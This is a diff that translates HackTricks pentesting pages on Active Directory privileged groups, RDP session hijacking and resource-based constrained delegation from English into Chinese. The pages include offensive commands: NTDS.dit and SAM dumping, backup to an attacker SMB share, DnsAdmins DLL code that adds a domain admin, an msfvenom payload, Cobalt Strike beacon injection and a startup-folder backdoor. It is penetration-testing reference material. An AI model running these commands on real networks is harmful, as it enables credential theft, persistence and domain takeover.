+如果你能捕获 [NTLMv1 挑战，请阅读如何破解它们](../ntlm/#ntlmv1-attack)。\
+&#xNAN;_&#x52;请记住，为了破解 NTLMv1，你需要将 Responder 挑战设置为 "1122334455667788"_
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/windows-hardening/active-directory-methodology/printnightmare.md b/src/windows-hardening/active-directory-methodology/printnightmare.md
index 37db1ab28..27ebf7627 100644
--- a/src/windows-hardening/active-directory-methodology/printnightmare.md
+++ b/src/windows-hardening/active-directory-methodology/printnightmare.md
@@ -2,7 +2,6 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-**Check this awesome blog post about PrintNightmare in 2024: [https://www.hackingarticles.in/understanding-printnightmare-vulnerability/](https://www.hackingarticles.in/understanding-printnightmare-vulnerability/)**
+**查看这篇关于2024年PrintNightmare的精彩博客文章: [https://www.hackingarticles.in/understanding-printnightmare-vulnerability/](https://www.hackingarticles.in/understanding-printnightmare-vulnerability/)**
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.md b/src/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.md
index 4d79df258..ed647ee29 100644
--- a/src/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.md
+++ b/src/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.md
@@ -1,115 +1,98 @@
-# Privileged Groups
+# 特权组
 
 {{#include ../../banners/hacktricks-training.md}}
 
 <figure><img src="/images/image (48).png" alt=""><figcaption></figcaption></figure>
 
-Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=command-injection) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
+使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=command-injection) 轻松构建和 **自动化工作流程**，由世界上 **最先进** 的社区工具提供支持。\
+立即获取访问权限：
 
 {% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=command-injection" %}
 
-## Well Known groups with administration privileges
+## 具有管理权限的知名组
 
 - **Administrators**
 - **Domain Admins**
 - **Enterprise Admins**
 
-## Account Operators
+## 账户操作员
 
-This group is empowered to create accounts and groups that are not administrators on the domain. Additionally, it enables local login to the Domain Controller (DC).
-
-To identify the members of this group, the following command is executed:
+该组有权创建不是域管理员的账户和组。此外，它还允许本地登录到域控制器 (DC)。
 
+要识别该组的成员，执行以下命令：
 ```powershell
 Get-NetGroupMember -Identity "Account Operators" -Recurse
 ```
+添加新用户是被允许的，同时也可以在 DC01 上进行本地登录。
 
-Adding new users is permitted, as well as local login to DC01.
+## AdminSDHolder 组
 
-## AdminSDHolder group
+**AdminSDHolder** 组的访问控制列表 (ACL) 至关重要，因为它为 Active Directory 中所有“受保护组”设置权限，包括高权限组。该机制通过防止未经授权的修改来确保这些组的安全。
 
-The **AdminSDHolder** group's Access Control List (ACL) is crucial as it sets permissions for all "protected groups" within Active Directory, including high-privilege groups. This mechanism ensures the security of these groups by preventing unauthorized modifications.
-
-An attacker could exploit this by modifying the **AdminSDHolder** group's ACL, granting full permissions to a standard user. This would effectively give that user full control over all protected groups. If this user's permissions are altered or removed, they would be automatically reinstated within an hour due to the system's design.
-
-Commands to review the members and modify permissions include:
+攻击者可以通过修改 **AdminSDHolder** 组的 ACL 来利用这一点，向标准用户授予完全权限。这将有效地使该用户对所有受保护组拥有完全控制权。如果该用户的权限被更改或移除，由于系统的设计，他们将在一小时内自动恢复。
 
+查看成员和修改权限的命令包括：
 ```powershell
 Get-NetGroupMember -Identity "AdminSDHolder" -Recurse
 Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -PrincipalIdentity matt -Rights All
 Get-ObjectAcl -SamAccountName "Domain Admins" -ResolveGUIDs | ?{$_.IdentityReference -match 'spotless'}
 ```
+一个脚本可用于加快恢复过程：[Invoke-ADSDPropagation.ps1](https://github.com/edemilliere/ADSI/blob/master/Invoke-ADSDPropagation.ps1)。
 
-A script is available to expedite the restoration process: [Invoke-ADSDPropagation.ps1](https://github.com/edemilliere/ADSI/blob/master/Invoke-ADSDPropagation.ps1).
+有关更多详细信息，请访问 [ired.team](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/how-to-abuse-and-backdoor-adminsdholder-to-obtain-domain-admin-persistence)。
 
-For more details, visit [ired.team](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/how-to-abuse-and-backdoor-adminsdholder-to-obtain-domain-admin-persistence).
-
-## AD Recycle Bin
-
-Membership in this group allows for the reading of deleted Active Directory objects, which can reveal sensitive information:
+## AD 回收站
 
+加入此组允许读取已删除的 Active Directory 对象，这可能会揭示敏感信息：
 ```bash
 Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties *
 ```
+### 域控制器访问
 
-### Domain Controller Access
+对 DC 上文件的访问受到限制，除非用户是 `Server Operators` 组的一部分，这会改变访问级别。
 
-Access to files on the DC is restricted unless the user is part of the `Server Operators` group, which changes the level of access.
-
-### Privilege Escalation
-
-Using `PsService` or `sc` from Sysinternals, one can inspect and modify service permissions. The `Server Operators` group, for instance, has full control over certain services, allowing for the execution of arbitrary commands and privilege escalation:
+### 权限提升
 
+使用 Sysinternals 的 `PsService` 或 `sc`，可以检查和修改服务权限。例如，`Server Operators` 组对某些服务拥有完全控制权，允许执行任意命令和权限提升：
 ```cmd
 C:\> .\PsService.exe security AppReadiness
 ```
+此命令显示 `Server Operators` 拥有完全访问权限，允许操纵服务以获取提升的权限。
 
-This command reveals that `Server Operators` have full access, enabling the manipulation of services for elevated privileges.
+## 备份操作员
 
-## Backup Operators
-
-Membership in the `Backup Operators` group provides access to the `DC01` file system due to the `SeBackup` and `SeRestore` privileges. These privileges enable folder traversal, listing, and file copying capabilities, even without explicit permissions, using the `FILE_FLAG_BACKUP_SEMANTICS` flag. Utilizing specific scripts is necessary for this process.
-
-To list group members, execute:
+加入 `Backup Operators` 组可访问 `DC01` 文件系统，因为拥有 `SeBackup` 和 `SeRestore` 权限。这些权限使得即使没有明确的权限，也能进行文件夹遍历、列出和复制文件的操作，使用 `FILE_FLAG_BACKUP_SEMANTICS` 标志。此过程需要使用特定的脚本。
 
+要列出组成员，请执行：
 ```powershell
 Get-NetGroupMember -Identity "Backup Operators" -Recurse
 ```
+### 本地攻击
 
-### Local Attack
-
-To leverage these privileges locally, the following steps are employed:
-
-1. Import necessary libraries:
+要在本地利用这些权限，采用以下步骤：
 
+1. 导入必要的库：
 ```bash
 Import-Module .\SeBackupPrivilegeUtils.dll
 Import-Module .\SeBackupPrivilegeCmdLets.dll
 ```
-
-2. Enable and verify `SeBackupPrivilege`:
-
+2. 启用并验证 `SeBackupPrivilege`：
 ```bash
 Set-SeBackupPrivilege
 Get-SeBackupPrivilege
 ```
-
-3. Access and copy files from restricted directories, for instance:
-
+3. 访问并复制受限目录中的文件，例如：
 ```bash
 dir C:\Users\Administrator\
 Copy-FileSeBackupPrivilege C:\Users\Administrator\report.pdf c:\temp\x.pdf -Overwrite
 ```
+### AD 攻击
 
-### AD Attack
+直接访问域控制器的文件系统允许窃取 `NTDS.dit` 数据库，该数据库包含所有域用户和计算机的 NTLM 哈希。
 
-Direct access to the Domain Controller's file system allows for the theft of the `NTDS.dit` database, which contains all NTLM hashes for domain users and computers.
-
-#### Using diskshadow.exe
-
-1. Create a shadow copy of the `C` drive:
+#### 使用 diskshadow.exe
 
+1. 创建 `C` 盘的影子副本：
 ```cmd
 diskshadow.exe
 set verbose on
@@ -122,59 +105,47 @@ expose %cdrive% F:
 end backup
 exit
 ```
-
-2. Copy `NTDS.dit` from the shadow copy:
-
+2. 从影子副本中复制 `NTDS.dit`：
 ```cmd
 Copy-FileSeBackupPrivilege E:\Windows\NTDS\ntds.dit C:\Tools\ntds.dit
 ```
-
-Alternatively, use `robocopy` for file copying:
-
+或者，使用 `robocopy` 进行文件复制：
 ```cmd
 robocopy /B F:\Windows\NTDS .\ntds ntds.dit
 ```
-
-3. Extract `SYSTEM` and `SAM` for hash retrieval:
-
+3. 提取 `SYSTEM` 和 `SAM` 以获取哈希：
 ```cmd
 reg save HKLM\SYSTEM SYSTEM.SAV
 reg save HKLM\SAM SAM.SAV
 ```
-
-4. Retrieve all hashes from `NTDS.dit`:
-
+4. 从 `NTDS.dit` 中检索所有哈希：
 ```shell-session
 secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL
 ```
+#### 使用 wbadmin.exe
 
-#### Using wbadmin.exe
+1. 在攻击者机器上设置 SMB 服务器的 NTFS 文件系统，并在目标机器上缓存 SMB 凭据。
+2. 使用 `wbadmin.exe` 进行系统备份和 `NTDS.dit` 提取：
+```cmd
+net use X: \\<AttackIP>\sharename /user:smbuser password
+echo "Y" | wbadmin start backup -backuptarget:\\<AttackIP>\sharename -include:c:\windows\ntds
+wbadmin get versions
+echo "Y" | wbadmin start recovery -version:<date-time> -itemtype:file -items:c:\windows\ntds\ntds.dit -recoverytarget:C:\ -notrestoreacl
+```
 
-1. Set up NTFS filesystem for SMB server on attacker machine and cache SMB credentials on the target machine.
-2. Use `wbadmin.exe` for system backup and `NTDS.dit` extraction:
-   ```cmd
-   net use X: \\<AttackIP>\sharename /user:smbuser password
-   echo "Y" | wbadmin start backup -backuptarget:\\<AttackIP>\sharename -include:c:\windows\ntds
-   wbadmin get versions
-   echo "Y" | wbadmin start recovery -version:<date-time> -itemtype:file -items:c:\windows\ntds\ntds.dit -recoverytarget:C:\ -notrestoreacl
-   ```
-
-For a practical demonstration, see [DEMO VIDEO WITH IPPSEC](https://www.youtube.com/watch?v=IfCysW0Od8w&t=2610s).
+有关实际演示，请参见 [DEMO VIDEO WITH IPPSEC](https://www.youtube.com/watch?v=IfCysW0Od8w&t=2610s)。
 
 ## DnsAdmins
 
-Members of the **DnsAdmins** group can exploit their privileges to load an arbitrary DLL with SYSTEM privileges on a DNS server, often hosted on Domain Controllers. This capability allows for significant exploitation potential.
-
-To list members of the DnsAdmins group, use:
+**DnsAdmins** 组的成员可以利用他们的权限在 DNS 服务器上加载具有 SYSTEM 权限的任意 DLL，通常托管在域控制器上。此能力允许显著的利用潜力。
 
+要列出 DnsAdmins 组的成员，请使用：
 ```powershell
 Get-NetGroupMember -Identity "DnsAdmins" -Recurse
 ```
+### 执行任意 DLL
 
-### Execute arbitrary DLL
-
-Members can make the DNS server load an arbitrary DLL (either locally or from a remote share) using commands such as:
-
+成员可以使用以下命令使 DNS 服务器加载任意 DLL（无论是本地的还是来自远程共享的）：
 ```powershell
 dnscmd [dc.computername] /config /serverlevelplugindll c:\path\to\DNSAdmin-DLL.dll
 dnscmd [dc.computername] /config /serverlevelplugindll \\1.2.3.4\share\DNSAdmin-DLL.dll
@@ -185,8 +156,8 @@ An attacker could modify the DLL to add a user to the Domain Admins group or exe
 // Modify DLL to add user
 DWORD WINAPI DnsPluginInitialize(PVOID pDnsAllocateFunction, PVOID pDnsFreeFunction)
 {
-    system("C:\\Windows\\System32\\net.exe user Hacker T0T4llyrAndOm... /add /domain");
-    system("C:\\Windows\\System32\\net.exe group \"Domain Admins\" Hacker /add /domain");
+system("C:\\Windows\\System32\\net.exe user Hacker T0T4llyrAndOm... /add /domain");
+system("C:\\Windows\\System32\\net.exe group \"Domain Admins\" Hacker /add /domain");
 }
 ```
 
@@ -194,107 +165,90 @@ DWORD WINAPI DnsPluginInitialize(PVOID pDnsAllocateFunction, PVOID pDnsFreeFunct
 // Generate DLL with msfvenom
 msfvenom -p windows/x64/exec cmd='net group "domain admins" <username> /add /domain' -f dll -o adduser.dll
 ```
-
-Restarting the DNS service (which may require additional permissions) is necessary for the DLL to be loaded:
-
+重新启动 DNS 服务（这可能需要额外的权限）是加载 DLL 所必需的：
 ```csharp
 sc.exe \\dc01 stop dns
 sc.exe \\dc01 start dns
 ```
-
-For more details on this attack vector, refer to ired.team.
+有关此攻击向量的更多详细信息，请参阅 ired.team。
 
 #### Mimilib.dll
 
-It's also feasible to use mimilib.dll for command execution, modifying it to execute specific commands or reverse shells. [Check this post](https://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html) for more information.
+使用 mimilib.dll 进行命令执行也是可行的，可以修改它以执行特定命令或反向 shell。 [查看此帖子](https://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html) 获取更多信息。
 
-### WPAD Record for MitM
+### WPAD 记录用于 MitM
 
-DnsAdmins can manipulate DNS records to perform Man-in-the-Middle (MitM) attacks by creating a WPAD record after disabling the global query block list. Tools like Responder or Inveigh can be used for spoofing and capturing network traffic.
-
-### Event Log Readers
-Members can access event logs, potentially finding sensitive information such as plaintext passwords or command execution details:
+DnsAdmins 可以操纵 DNS 记录，通过在禁用全局查询阻止列表后创建 WPAD 记录来执行中间人 (MitM) 攻击。可以使用 Responder 或 Inveigh 等工具进行欺骗和捕获网络流量。
 
+### 事件日志读取器
+成员可以访问事件日志，可能会找到敏感信息，例如明文密码或命令执行详细信息：
 ```powershell
 # Get members and search logs for sensitive information
 Get-NetGroupMember -Identity "Event Log Readers" -Recurse
 Get-WinEvent -LogName security | where { $_.ID -eq 4688 -and $_.Properties[8].Value -like '*/user*'}
 ```
+## Exchange Windows 权限
 
-## Exchange Windows Permissions
-
-This group can modify DACLs on the domain object, potentially granting DCSync privileges. Techniques for privilege escalation exploiting this group are detailed in Exchange-AD-Privesc GitHub repo.
-
+该组可以修改域对象上的 DACL，可能授予 DCSync 权限。利用该组进行权限提升的技术详见 Exchange-AD-Privesc GitHub 仓库。
 ```powershell
 # List members
 Get-NetGroupMember -Identity "Exchange Windows Permissions" -Recurse
 ```
+## Hyper-V 管理员
 
-## Hyper-V Administrators
+Hyper-V 管理员对 Hyper-V 拥有完全访问权限，这可以被利用来控制虚拟化的域控制器。这包括克隆实时域控制器和从 NTDS.dit 文件中提取 NTLM 哈希。
 
-Hyper-V Administrators have full access to Hyper-V, which can be exploited to gain control over virtualized Domain Controllers. This includes cloning live DCs and extracting NTLM hashes from the NTDS.dit file.
-
-### Exploitation Example
-
-Firefox's Mozilla Maintenance Service can be exploited by Hyper-V Administrators to execute commands as SYSTEM. This involves creating a hard link to a protected SYSTEM file and replacing it with a malicious executable:
+### 利用示例
 
+Hyper-V 管理员可以利用 Firefox 的 Mozilla Maintenance Service 以 SYSTEM 身份执行命令。这涉及创建一个指向受保护的 SYSTEM 文件的硬链接，并用恶意可执行文件替换它：
 ```bash
 # Take ownership and start the service
 takeown /F C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
 sc.exe start MozillaMaintenance
 ```
+注意：硬链接利用在最近的Windows更新中已被缓解。
 
-Note: Hard link exploitation has been mitigated in recent Windows updates.
+## 组织管理
 
-## Organization Management
+在部署了**Microsoft Exchange**的环境中，一个特殊的组称为**组织管理**，拥有重要的能力。该组有权**访问所有域用户的邮箱**，并对“Microsoft Exchange安全组”组织单位（OU）拥有**完全控制权**。这种控制包括**`Exchange Windows Permissions`**组，可以被利用进行权限提升。
 
-In environments where **Microsoft Exchange** is deployed, a special group known as **Organization Management** holds significant capabilities. This group is privileged to **access the mailboxes of all domain users** and maintains **full control over the 'Microsoft Exchange Security Groups'** Organizational Unit (OU). This control includes the **`Exchange Windows Permissions`** group, which can be exploited for privilege escalation.
+### 权限利用和命令
 
-### Privilege Exploitation and Commands
+#### 打印操作员
 
-#### Print Operators
-
-Members of the **Print Operators** group are endowed with several privileges, including the **`SeLoadDriverPrivilege`**, which allows them to **log on locally to a Domain Controller**, shut it down, and manage printers. To exploit these privileges, especially if **`SeLoadDriverPrivilege`** is not visible under an unelevated context, bypassing User Account Control (UAC) is necessary.
-
-To list the members of this group, the following PowerShell command is used:
+**打印操作员**组的成员被赋予多个权限，包括**`SeLoadDriverPrivilege`**，允许他们**在域控制器上本地登录**、关闭它并管理打印机。为了利用这些权限，特别是当**`SeLoadDriverPrivilege`**在未提升的上下文中不可见时，必须绕过用户帐户控制（UAC）。
 
+要列出该组的成员，可以使用以下PowerShell命令：
 ```powershell
 Get-NetGroupMember -Identity "Print Operators" -Recurse
 ```
+有关 **`SeLoadDriverPrivilege`** 的更详细利用技术，应咨询特定的安全资源。
 
-For more detailed exploitation techniques related to **`SeLoadDriverPrivilege`**, one should consult specific security resources.
-
-#### Remote Desktop Users
-
-This group's members are granted access to PCs via Remote Desktop Protocol (RDP). To enumerate these members, PowerShell commands are available:
+#### 远程桌面用户
 
+该组的成员通过远程桌面协议 (RDP) 获得对 PC 的访问权限。要列举这些成员，可以使用 PowerShell 命令：
 ```powershell
 Get-NetGroupMember -Identity "Remote Desktop Users" -Recurse
 Get-NetLocalGroupMember -ComputerName <pc name> -GroupName "Remote Desktop Users"
 ```
+进一步了解利用 RDP 的信息可以在专门的渗透测试资源中找到。
 
-Further insights into exploiting RDP can be found in dedicated pentesting resources.
-
-#### Remote Management Users
-
-Members can access PCs over **Windows Remote Management (WinRM)**. Enumeration of these members is achieved through:
+#### 远程管理用户
 
+成员可以通过 **Windows 远程管理 (WinRM)** 访问 PC。通过以下方式枚举这些成员：
 ```powershell
 Get-NetGroupMember -Identity "Remote Management Users" -Recurse
 Get-NetLocalGroupMember -ComputerName <pc name> -GroupName "Remote Management Users"
 ```
+对于与 **WinRM** 相关的利用技术，应咨询特定文档。
 
-For exploitation techniques related to **WinRM**, specific documentation should be consulted.
-
-#### Server Operators
-
-This group has permissions to perform various configurations on Domain Controllers, including backup and restore privileges, changing system time, and shutting down the system. To enumerate the members, the command provided is:
+#### 服务器操作员
 
+该组具有在域控制器上执行各种配置的权限，包括备份和恢复权限、改变系统时间和关闭系统。要枚举成员，可以使用以下命令：
 ```powershell
 Get-NetGroupMember -Identity "Server Operators" -Recurse
 ```
-
-## References <a href="#references" id="references"></a>
+## 参考文献 <a href="#references" id="references"></a>
 
 - [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/privileged-accounts-and-token-privileges](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/privileged-accounts-and-token-privileges)
 - [https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-escalation/](https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-escalation/)
@@ -313,10 +267,9 @@ Get-NetGroupMember -Identity "Server Operators" -Recurse
 
 <figure><img src="/images/image (48).png" alt=""><figcaption></figcaption></figure>
 
-Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=command-injection) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
+使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=command-injection) 轻松构建和 **自动化工作流程**，由世界上 **最先进** 的社区工具提供支持。\
+立即获取访问权限：
 
 {% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=command-injection" %}
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/windows-hardening/active-directory-methodology/rdp-sessions-abuse.md b/src/windows-hardening/active-directory-methodology/rdp-sessions-abuse.md
index 46d8956aa..c79b2be6c 100644
--- a/src/windows-hardening/active-directory-methodology/rdp-sessions-abuse.md
+++ b/src/windows-hardening/active-directory-methodology/rdp-sessions-abuse.md
@@ -2,12 +2,11 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## RDP Process Injection
+## RDP 进程注入
 
-If the **external group** has **RDP access** to any **computer** in the current domain, an **attacker** could **compromise that computer and wait for him**.
-
-Once that user has accessed via RDP, the **attacker can pivot to that users session** and abuse its permissions in the external domain.
+如果 **外部组** 对当前域中的任何 **计算机** 具有 **RDP 访问权限**，则 **攻击者** 可以 **入侵该计算机并等待他**。
 
+一旦该用户通过 RDP 访问，**攻击者可以转移到该用户的会话** 并滥用其在外部域中的权限。
 ```powershell
 # Supposing the group "External Users" has RDP access in the current domain
 ## lets find where they could access
@@ -23,23 +22,21 @@ EXT\super.admin
 
 # With cobalt strike you could just inject a beacon inside of the RDP process
 beacon> ps
- PID   PPID  Name                         Arch  Session     User
- ---   ----  ----                         ----  -------     -----
- ...
- 4960  1012  rdpclip.exe                  x64   3           EXT\super.admin
+PID   PPID  Name                         Arch  Session     User
+---   ----  ----                         ----  -------     -----
+...
+4960  1012  rdpclip.exe                  x64   3           EXT\super.admin
 
 beacon> inject 4960 x64 tcp-local
 ## From that beacon you can just run powerview modules interacting with the external domain as that user
 ```
-
-Check **other ways to steal sessions with other tools** [**in this page.**](../../network-services-pentesting/pentesting-rdp.md#session-stealing)
+检查 **其他工具窃取会话的其他方法** [**在此页面。**](../../network-services-pentesting/pentesting-rdp.md#session-stealing)
 
 ## RDPInception
 
-If a user access via **RDP into a machine** where an **attacker** is **waiting** for him, the attacker will be able to **inject a beacon in the RDP session of the user** and if the **victim mounted his drive** when accessing via RDP, the **attacker could access it**.
-
-In this case you could just **compromise** the **victims** **original computer** by writing a **backdoor** in the **statup folder**.
+如果用户通过 **RDP 访问一台机器**，而 **攻击者** 正在 **等待** 他，攻击者将能够 **在用户的 RDP 会话中注入一个信标**，如果 **受害者在通过 RDP 访问时挂载了他的驱动器**，**攻击者可以访问它**。
 
+在这种情况下，你可以通过在 **启动文件夹** 中写入一个 **后门** 来 **妥协** **受害者** 的 **原始计算机**。
 ```powershell
 # Wait til someone logs in:
 net logons
@@ -48,10 +45,10 @@ EXT\super.admin
 
 # With cobalt strike you could just inject a beacon inside of the RDP process
 beacon> ps
- PID   PPID  Name                         Arch  Session     User
- ---   ----  ----                         ----  -------     -----
- ...
- 4960  1012  rdpclip.exe                  x64   3           EXT\super.admin
+PID   PPID  Name                         Arch  Session     User
+---   ----  ----                         ----  -------     -----
+...
+4960  1012  rdpclip.exe                  x64   3           EXT\super.admin
 
 beacon> inject 4960 x64 tcp-local
 
@@ -59,18 +56,16 @@ beacon> inject 4960 x64 tcp-local
 ## \\tsclient\c is the C: drive on the origin machine of the RDP session
 beacon> ls \\tsclient\c
 
- Size     Type    Last Modified         Name
- ----     ----    -------------         ----
-          dir     02/10/2021 04:11:30   $Recycle.Bin
-          dir     02/10/2021 03:23:44   Boot
-          dir     02/20/2021 10:15:23   Config.Msi
-          dir     10/18/2016 01:59:39   Documents and Settings
-          [...]
+Size     Type    Last Modified         Name
+----     ----    -------------         ----
+dir     02/10/2021 04:11:30   $Recycle.Bin
+dir     02/10/2021 03:23:44   Boot
+dir     02/20/2021 10:15:23   Config.Msi
+dir     10/18/2016 01:59:39   Documents and Settings
+[...]
 
 # Upload backdoor to startup folder
 beacon> cd \\tsclient\c\Users\<username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
 beacon> upload C:\Payloads\pivot.exe
 ```
-
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/windows-hardening/active-directory-methodology/resource-based-constrained-delegation.md b/src/windows-hardening/active-directory-methodology/resource-based-constrained-delegation.md
index 9093a7241..111175442 100644
--- a/src/windows-hardening/active-directory-methodology/resource-based-constrained-delegation.md
+++ b/src/windows-hardening/active-directory-methodology/resource-based-constrained-delegation.md
@@ -1,4 +1,4 @@
-# Resource-based Constrained Delegation
+# 基于资源的受限委派
 
 {{#include ../../banners/hacktricks-training.md}}
 
@@ -6,47 +6,44 @@
 
 {% embed url="https://websec.nl/" %}
 
-## Basics of Resource-based Constrained Delegation
+## 基于资源的受限委派基础
 
-This is similar to the basic [Constrained Delegation](constrained-delegation.md) but **instead** of giving permissions to an **object** to **impersonate any user against a service**. Resource-based Constrain Delegation **sets** in **the object who is able to impersonate any user against it**.
+这类似于基本的 [Constrained Delegation](constrained-delegation.md)，但**不是**给一个**对象**权限以**代表任何用户对服务进行冒充**。基于资源的受限委派**设置**在**对象中谁能够代表任何用户对其进行冒充**。
 
-In this case, the constrained object will have an attribute called _**msDS-AllowedToActOnBehalfOfOtherIdentity**_ with the name of the user that can impersonate any other user against it.
+在这种情况下，受限对象将具有一个名为 _**msDS-AllowedToActOnBehalfOfOtherIdentity**_ 的属性，包含可以代表任何其他用户对其进行冒充的用户的名称。
 
-Another important difference from this Constrained Delegation to the other delegations is that any user with **write permissions over a machine account** (_GenericAll/GenericWrite/WriteDacl/WriteProperty/etc_) can set the _**msDS-AllowedToActOnBehalfOfOtherIdentity**_ (In the other forms of Delegation you needed domain admin privs).
+与其他委派相比，这种受限委派的另一个重要区别是，任何具有**计算机账户的写权限**（_GenericAll/GenericWrite/WriteDacl/WriteProperty等） 的用户都可以设置 _**msDS-AllowedToActOnBehalfOfOtherIdentity**_（在其他形式的委派中，您需要域管理员权限）。
 
-### New Concepts
+### 新概念
 
-Back in Constrained Delegation it was told that the **`TrustedToAuthForDelegation`** flag inside the _userAccountControl_ value of the user is needed to perform a **S4U2Self.** But that's not completely truth.\
-The reality is that even without that value, you can perform a **S4U2Self** against any user if you are a **service** (have a SPN) but, if you **have `TrustedToAuthForDelegation`** the returned TGS will be **Forwardable** and if you **don't have** that flag the returned TGS **won't** be **Forwardable**.
+在受限委派中提到，用户的 _userAccountControl_ 值中的 **`TrustedToAuthForDelegation`** 标志是执行 **S4U2Self** 所需的。但这并不完全正确。\
+实际上，即使没有该值，如果您是一个**服务**（具有 SPN），您也可以对任何用户执行 **S4U2Self**，但是，如果您**具有 `TrustedToAuthForDelegation`**，返回的 TGS 将是**可转发的**，而如果您**没有**该标志，返回的 TGS **将不会**是**可转发的**。
 
-However, if the **TGS** used in **S4U2Proxy** is **NOT Forwardable** trying to abuse a **basic Constrain Delegation** it **won't work**. But if you are trying to exploit a **Resource-Based constrain delegation, it will work** (this is not a vulnerability, it's a feature, apparently).
+然而，如果在 **S4U2Proxy** 中使用的 **TGS** **不是可转发的**，尝试利用**基本受限委派**将**不起作用**。但如果您尝试利用**基于资源的受限委派，它将有效**（这不是一个漏洞，而是一个特性，显然）。
 
-### Attack structure
+### 攻击结构
 
-> If you have **write equivalent privileges** over a **Computer** account you can obtain **privileged access** in that machine.
+> 如果您对**计算机**账户具有**写等效权限**，则可以在该计算机上获得**特权访问**。
 
-Suppose that the attacker has already **write equivalent privileges over the victim computer**.
+假设攻击者已经对受害者计算机具有**写等效权限**。
 
-1. The attacker **compromises** an account that has a **SPN** or **creates one** (“Service A”). Note that **any** _Admin User_ without any other special privilege can **create** up until 10 **Computer objects (**_**MachineAccountQuota**_**)** and set them a **SPN**. So the attacker can just create a Computer object and set a SPN.
-2. The attacker **abuses its WRITE privilege** over the victim computer (ServiceB) to configure **resource-based constrained delegation to allow ServiceA to impersonate any user** against that victim computer (ServiceB).
-3. The attacker uses Rubeus to perform a **full S4U attack** (S4U2Self and S4U2Proxy) from Service A to Service B for a user **with privileged access to Service B**.
-   1. S4U2Self (from the SPN compromised/created account): Ask for a **TGS of Administrator to me** (Not Forwardable).
-   2. S4U2Proxy: Use the **not Forwardable TGS** of the step before to ask for a **TGS** from **Administrator** to the **victim host**.
-   3. Even if you are using a not Forwardable TGS, as you are exploiting Resource-based constrained delegation, it will work.
-4. The attacker can **pass-the-ticket** and **impersonate** the user to gain **access to the victim ServiceB**.
-
-To check the _**MachineAccountQuota**_ of the domain you can use:
+1. 攻击者**破坏**一个具有**SPN**的账户或**创建一个**（“服务 A”）。请注意，**任何**_管理员用户_在没有其他特殊权限的情况下可以**创建**最多 10 个**计算机对象（**_**MachineAccountQuota**_**）并为其设置一个**SPN**。因此，攻击者可以创建一个计算机对象并设置一个 SPN。
+2. 攻击者**利用其对受害者计算机的写权限**（ServiceB）配置**基于资源的受限委派，以允许 ServiceA 代表任何用户对该受害者计算机（ServiceB）进行冒充**。
+3. 攻击者使用 Rubeus 执行**完整的 S4U 攻击**（S4U2Self 和 S4U2Proxy），从服务 A 到服务 B，针对**具有对服务 B 的特权访问的用户**。
+   1. S4U2Self（来自被破坏/创建的 SPN 账户）：请求**管理员的 TGS 给我**（不可转发）。
+   2. S4U2Proxy：使用前一步的**不可转发 TGS**请求从**管理员**到**受害主机**的**TGS**。
+   3. 即使您使用的是不可转发的 TGS，由于您正在利用基于资源的受限委派，它将有效。
+   4. 攻击者可以**传票**并**冒充**用户以获得对**受害者 ServiceB**的**访问**。
 
+要检查域的 _**MachineAccountQuota**_，您可以使用：
 ```powershell
 Get-DomainObject -Identity "dc=domain,dc=local" -Domain domain.local | select MachineAccountQuota
 ```
+## 攻击
 
-## Attack
-
-### Creating a Computer Object
-
-You can create a computer object inside the domain using [powermad](https://github.com/Kevin-Robertson/Powermad)**:**
+### 创建计算机对象
 
+您可以使用 [powermad](https://github.com/Kevin-Robertson/Powermad) 在域内创建计算机对象。
 ```powershell
 import-module powermad
 New-MachineAccount -MachineAccount SERVICEA -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose
@@ -54,18 +51,14 @@ New-MachineAccount -MachineAccount SERVICEA -Password $(ConvertTo-SecureString '
 # Check if created
 Get-DomainComputer SERVICEA
 ```
+### 配置基于资源的受限委派
 
-### Configuring R**esource-based Constrained Delegation**
-
-**Using activedirectory PowerShell module**
-
+**使用 activedirectory PowerShell 模块**
 ```powershell
 Set-ADComputer $targetComputer -PrincipalsAllowedToDelegateToAccount SERVICEA$ #Assing delegation privileges
 Get-ADComputer $targetComputer -Properties PrincipalsAllowedToDelegateToAccount #Check that it worked
 ```
-
-**Using powerview**
-
+**使用 powerview**
 ```powershell
 $ComputerSid = Get-DomainComputer FAKECOMPUTER -Properties objectsid | Select -Expand objectsid
